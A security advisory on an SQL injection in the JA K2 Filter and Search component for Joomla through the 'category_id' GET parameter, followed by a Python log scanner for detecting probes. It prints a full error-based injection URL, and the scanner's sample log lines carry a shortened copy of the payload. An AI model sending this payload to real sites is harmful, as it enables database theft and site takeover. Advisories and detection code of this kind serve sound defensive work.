SB2016102002 - SQL injection in JA K2 Filter Component for Joomla!
Published: October 20, 2016 Updated: January 4, 2017
Description
This security bulletin contains information about 1 vulnerability.
1) SQL injection (CVE-ID: N/A)
The vulnerability allows a remote attacker to execute arbitrary SQL commands in the vulnerable application.
The vulnerability exists due to insufficient sanitization of user-supplied data passed via the "category_id" HTTP GET parameter to /index.php in the ja-k2-filter-and-search component. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the web application's database.
Successful exploitation may allow an attacker to gain complete control over the vulnerable website.
Exploitation example:
http://[host]/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27
The vulnerability was reported in version 1.2.2. Prior versions may also be affected.
Remediation
Install the update from the vendor's website.
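To check whether a site was probed through this parameter before the update was installed, the added example below (not part of the original bulletin or the vendor's code) scans web-server access-log lines for com_jak2filter requests whose "category_id" is not numeric. It assumes combined-log-format lines and that legitimate values are a numeric ID or a comma-separated list of IDs; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate category_id is a numeric ID or comma-separated IDs.
SAFE_CATEGORY_ID = re.compile(r"^\d+(,\d+)*$")
# Request field of a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, shortened payload).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2016:10:01:02 +0000] "GET /index.php?option=com_jak2filter'
    '&view=itemlist&category_id=12&searchword=the&Itemid=135 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Oct/2016:10:01:07 +0000] "GET /index.php?category_id='
    '(select%201%20and%20row(1%2c1)%3E(select%20count(*)))&Itemid=135'
    '&option=com_jak2filter&view=itemlist HTTP/1.1" 500 312 "-" "-"',
    '203.0.113.7 - - [21/Oct/2016:10:02:00 +0000] "GET /index.php?option=com_content'
    '&category_id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def suspicious_category_id(log_line):
    """Return the decoded category_id if a com_jak2filter request carries a
    non-numeric value, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes values, so encoded payloads are compared in clear.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_jak2filter" not in params.get("option", []):
        return None  # other components are out of scope for this bulletin
    for value in params.get("category_id", []):
        value = value.strip()
        if value and not SAFE_CATEGORY_ID.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_category_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric category_id: {value!r}")
```

A hit shows that the parameter was probed, not that the injection succeeded; the response status and the database logs for the same timestamp help tell the two apart.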